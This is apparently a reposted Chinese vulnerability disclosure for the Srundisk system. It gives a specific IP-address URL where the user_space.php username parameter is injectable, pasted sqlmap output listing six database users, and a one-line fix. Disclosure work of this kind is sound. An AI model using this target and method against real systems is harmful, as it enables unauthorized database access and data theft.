刚看看官网原来跟Srun3000另外一款Srundisk系统Url:http://218.75.75.92/user_space.php?username=admin
username参数过滤不严,直接单引号检测,直接跳转进入空间页面,但是都到Sqlmap可以直接跑数据。
database management system users [6]:
[*] ''@'localhost'
[*] 'aaa'@'%'
[*] 'guest'@'%'
[*] 'icc'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
修复方案:
过滤,好好检测下。
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;